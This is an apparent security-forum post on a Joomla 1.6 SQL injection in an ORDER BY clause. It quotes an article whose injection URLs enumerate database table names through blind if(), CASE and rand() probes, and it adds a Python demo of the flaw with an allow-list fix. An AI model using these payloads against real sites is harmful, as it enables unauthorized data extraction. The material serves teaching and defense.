[Article] Exploiting SQL injection in the ORDER BY clause 19/03/2011 16:53:18 (+0700) | #1 | 233526
xnohat
Moderator

Today there is a new bug in Joomla 1.60, an SQL injection bug

http://www.securityfocus.com/bid/46846/exploit

However, this bug lies in an ORDER BY clause

Unknown column 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in 'order clause' SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN a.modified = 0 THEN a.created ELSE a.modified END as modified, a.modified_by, uam.name as modified_by_name,CASE WHEN a.publish_up = 0 THEN a.created ELSE a.publish_up END as publish_up, a.publish_down, a.attribs, a.metadata, a.metakey, a.metadesc, a.access, a.hits, a.xreference, a.featured, LENGTH(a.fulltext) AS readmore ,CASE WHEN badcats.id is not null THEN 0 ELSE a.state END AS state,c.title AS category_title, c.path AS category_route, c.access AS category_access, c.alias AS category_alias,CASE WHEN a.created_by_alias > ' ' THEN a.created_by_alias ELSE ua.name END AS author,ua.email AS author_email,contact.id as contactid,parent.title as parent_title, parent.id as parent_id, parent.path as parent_route, parent.alias as parent_alias,ROUND( v.rating_sum / v.rating_count ) AS rating, v.rating_count as rating_count,c.published, CASE WHEN badcats.id is null THEN c.published ELSE 0 END AS parents_published FROM anh_content AS a LEFT JOIN anh_content_frontpage AS fp ON fp.content_id = a.id LEFT JOIN anh_categories AS c ON c.id = a.catid LEFT JOIN anh_users AS ua ON ua.id = a.created_by LEFT JOIN anh_users AS uam ON uam.id = a.modified_by LEFT JOIN anh_contact_details AS contact on contact.user_id = a.created_by LEFT JOIN anh_categories as parent ON parent.id = c.parent_id LEFT JOIN anh_content_rating AS v ON a.id = v.content_id LEFT OUTER JOIN (SELECT cat.id as id FROM anh_categories AS cat JOIN anh_categories AS parent ON cat.lft BETWEEN parent.lft AND parent.rgt WHERE parent.extension = 'com_content' AND parent.published != 1 GROUP BY cat.id ) AS badcats ON badcats.id = c.id WHERE a.access IN (1,1) AND CASE WHEN badcats.id is null THEN a.state ELSE 0 END = 1 AND (a.publish_up = '0000-00-00 00:00:00' OR a.publish_up <= '2011-03-19 10:48:10') AND (a.publish_down = '0000-00-00 00:00:00' OR a.publish_down >= '2011-03-19 10:48:10') ORDER BY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA , 2, c.lft, fp.ordering, a.created ASC LIMIT 4, 3
 


The attack therefore does not follow the usual SQL injection exploitation methods. Blind SQL injection is the promising direction for exploiting it.

See the article below for how SQL injection in the ORDER BY clause is exploited.


eXploiting SQL injection in ORDER BY clause (MySQL 5)
by Jacco van Tuijl

This URL will show a list ordered by column 1:

http://www.test.com/list.php?orderby=1

This is what the SQL query that is executed on the database might look like:
SELECT id,name,price FROM list ORDER BY 1

If it would be vulnerable to SQL injection we could try :

http://www.test.com/list.php?orderby=if(true,id,price)

and

http://www.test.com/list.php?orderby=if(false,id,price)

to see if they give a different result

or

http://www.test.com/list.php?orderby=(select case when (true) then id else price end)
and
http://www.test.com/list.php?orderby=(select case when (false) then id else price end)
to see if they give a different result.

If they do give a different result you might be able to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=if((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)
and this:
http://www.test.com/list.php?orderby=(select case when ((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128) then id else price end)

The backside of these methods is that they require knowledge of the column names.
So I worked out a different method that doesn't require knowledge of the column names.

ORDER BY rand()

We can make a request like this:

http://www.test.com/list.php?orderby=rand(true)

returns a different result than this request:

http://www.test.com/list.php?orderby=rand(false)

We can use it to enumerate the first char of the table_name in information_schema.tables like this:
http://www.test.com/list.php?orderby=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)

And it is all quoteless!

Greetingz,
Jacco van Tuijl
 

Original Article: http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
Just clear, "What I need to do and how to do it"

Chat box moved to: http://www.facebook.com/hvaonline
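
The fix for the pattern discussed in this thread, as an added example that is not part of the original post or the quoted article: ORDER BY identifiers cannot be bound as query parameters, so the `orderby` value is mapped through an allow-list instead of being pasted into the statement. It assumes an in-memory SQLite database standing in for MySQL, the `list` table from the article with constructed rows, and hypothetical function names.

```python
import sqlite3

# Allow-list: request value -> fixed SQL identifier. Client text never reaches SQL.
SORT_COLUMNS = {"1": "id", "2": "name", "3": "price",
                "id": "id", "name": "name", "price": "price"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_demo_db():
    """Constructed sample data: id order and price order differ."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE list (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO list VALUES (?, ?, ?)",
                     [(1, "cable", 9.5), (2, "adapter", 3.0), (3, "switch", 20.0)])
    return conn


def list_ids_unsafe(conn, orderby):
    """The flawed pattern: the parameter is pasted into ORDER BY as SQL."""
    sql = f"SELECT id, name, price FROM list ORDER BY {orderby}"
    return [row[0] for row in conn.execute(sql)]


def build_order_by(orderby, direction="asc"):
    """Return an ORDER BY fragment made only of allow-listed constants."""
    column = SORT_COLUMNS.get(str(orderby).strip().lower())
    sort_dir = SORT_DIRECTIONS.get(str(direction).strip().lower())
    if column is None or sort_dir is None:
        # Reject instead of silently defaulting so the request can be logged.
        raise ValueError("unsupported sort parameter")
    return f"ORDER BY {column} {sort_dir}"


def list_ids_safe(conn, orderby, direction="asc"):
    """Hardened query: identifiers cannot be bound, so they come from the map."""
    sql = f"SELECT id, name, price FROM list {build_order_by(orderby, direction)}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_demo_db()
    probe = "(select case when ({}) then id else price end)"  # form quoted in the article
    print(list_ids_unsafe(db, probe.format("true")),
          list_ids_unsafe(db, probe.format("false")))
    for value in ("price", "rand(true)"):
        try:
            print(value, list_ids_safe(db, value))
        except ValueError as exc:
            print(value, "rejected:", exc)
```

Rejected values are worth logging: an `orderby` parameter containing parentheses or keywords is a reliable signal of probing against this kind of endpoint.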